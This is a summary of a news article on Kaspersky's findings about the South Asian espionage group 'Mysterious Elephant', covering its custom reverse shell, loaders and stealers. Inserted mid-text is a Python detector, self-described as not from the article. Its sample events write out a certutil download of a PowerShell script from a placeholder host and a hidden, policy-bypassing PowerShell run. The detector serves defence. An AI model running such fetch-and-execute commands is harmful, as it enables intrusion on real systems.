‘Mysterious Elephant’ Moves Beyond Recycled Malware
Summary
Kaspersky researchers say the threat group tracked as “Mysterious Elephant” has evolved from reusing others’ malware to deploying a compact, custom toolset in attacks that began in early 2025. The group targets government and diplomatic organisations across South Asia — notably Pakistan, Bangladesh and Sri Lanka — using highly tailored spear‑phishing with convincing decoy documents to gain initial access.
Once inside, the attackers use legitimate utilities (curl/certutil) to run PowerShell downloaders, then deploy a C++ reverse shell called BabShell. BabShell provides interactive control and the ability to fetch additional payloads, including in‑memory loaders (MemLoader HidenDesk and MemLoader Edge) which install backdoors such as Remcos and VRAT without touching disk.
The operators also use specialised data‑theft modules: Uplo (scans and exfiltrates documents and images), Stom (targets WhatsApp Desktop folders and secondary drives) and ChromeStealer Exfiltrator (harvests browser and WhatsApp Web data). Infrastructure tactics include per‑victim wildcard DNS domains to frustrate tracking. Kaspersky notes code overlaps with other regional actors (Origami Elephant, Confucius, SideWinder) but stops short of firm nation‑state attribution. The vendor recommends multilayered defences and threat‑led intelligence to counter the group’s evolving TTPs.
Key Points
- Mysterious Elephant has moved from reused malware to bespoke tools and loaders since early 2025.
- Targets are highly specific: government and diplomatic entities across South Asia (Pakistan, Bangladesh, Sri Lanka, plus others).
- Initial access via tailored spear‑phishing and decoy documents; PowerShell downloader executed by legitimate tools (curl/certutil).
- Core custom tools include BabShell (C++ reverse shell) and in‑memory loaders (MemLoader HidenDesk / MemLoader Edge) to deploy Remcos and VRAT.
- Data theft modules (Uplo, Stom, ChromeStealer Exfiltrator) focus on documents, images and WhatsApp/Chrome data.
- Infrastructure uses wildcard DNS per victim to hinder tracking; code overlaps hint at collaboration or shared resources with other regional APTs.
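The curl/certutil-to-PowerShell chain and the per-victim wildcard DNS footprint listed above, as an added detection example that is not from the article or from Kaspersky's report; the host names, file names, event layouts and the naive two-label parent-domain split are assumptions:

```python
from collections import defaultdict

DOWNLOADERS = {"curl.exe", "certutil.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
WINDOW_SECONDS = 120  # assumed maximum gap between the fetch and the script run

def file_tokens(cmd):
    """Bare file-name tokens in a command line (drops switches and URLs)."""
    return {t for t in cmd.lower().split() if "." in t and "://" not in t and not t.startswith("-")}

def suspicious_download_chains(events):
    """events: (ts, host, image, command line). Flag a PowerShell start that follows a
    curl/certutil run on the same host within the window and names the same file."""
    hits, recent = [], defaultdict(list)  # host -> [(ts, file tokens the utility fetched)]
    for ts, host, image, cmd in sorted(events):
        if image in DOWNLOADERS:
            recent[host].append((ts, file_tokens(cmd)))
        elif image in SHELLS and any(
                ts - dts <= WINDOW_SECONDS and toks & file_tokens(cmd) for dts, toks in recent[host]):
            hits.append((host, ts, cmd))
    return hits

def wildcard_dns_candidates(queries, min_labels=3):
    """queries: (host, queried name). Flag parent domains with at least min_labels distinct
    child names where each child name was resolved by exactly one host (one name per victim)."""
    seen = defaultdict(lambda: defaultdict(set))  # parent -> child label -> hosts
    for host, fqdn in queries:
        labels = fqdn.lower().rstrip(".").split(".")
        if len(labels) >= 3:  # naive two-label parent split; a real rule would use the public suffix list
            seen[".".join(labels[-2:])][".".join(labels[:-2])].add(host)
    return sorted(parent for parent, subs in seen.items()
                  if len(subs) >= min_labels and all(len(h) == 1 for h in subs.values()))

# Constructed sample telemetry (not real indicators from the report).
PROCESS_EVENTS = [
    (100, "ws-01", "certutil.exe", "certutil -urlcache -f http://cdn.example.invalid/up.ps1 up.ps1"),
    (130, "ws-01", "powershell.exe", "powershell -ep bypass -w hidden -f up.ps1"),
    (200, "ws-02", "curl.exe", "curl -o report.pdf https://intranet.example/report.pdf"),
]
DNS_QUERIES = [
    ("ws-01", "k3x9.relay.example.invalid"), ("ws-02", "p7qa.relay.example.invalid"),
    ("ws-03", "m2vd.relay.example.invalid"), ("ws-01", "mail.corp.example"),
    ("ws-02", "mail.corp.example"), ("ws-03", "mail.corp.example"),
]

if __name__ == "__main__":
    print("download chains:", suspicious_download_chains(PROCESS_EVENTS))
    print("wildcard DNS candidates:", wildcard_dns_candidates(DNS_QUERIES))
```

The benign curl fetch on ws-02 and the shared mail host under corp.example are left unflagged, which is the point of tying the PowerShell start to the fetched file and requiring one host per child name.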
Context and Relevance
This development is a clear example of regional APTs maturing: rather than relying on commodity malware, actors are building modular, stealthy toolchains tailored to their target environment (including apps like WhatsApp that are widely used for official communications in the region). For defenders, this raises the bar — standard endpoint controls and signature detection are less likely to catch in‑memory loaders and bespoke stealers. The report feeds into broader trends: more localised, persistent espionage campaigns in Asia and an emphasis on living‑off‑the‑land plus fileless techniques.
Author style
Punchy: Kaspersky’s findings are a timely wake‑up call. If you protect government, diplomatic or foreign‑affairs environments — or handle regional incident response — this is directly relevant and worth digging into for IoCs and mitigations.
Why should I read this?
Quick and blunt: this isn’t amateur hour anymore. The group has upgraded from recycled bits to custom, stealthy tools aimed at stealing WhatsApp chats and sensitive documents from government targets. If you work in threat intel, SOC ops or protect South Asian government/diplomatic assets, reading the full report will save you time and help you prioritise the right detections and containment steps.
Source
Source: https://www.darkreading.com/cyberattacks-data-breaches/mysterious-elephant-recycled-malware
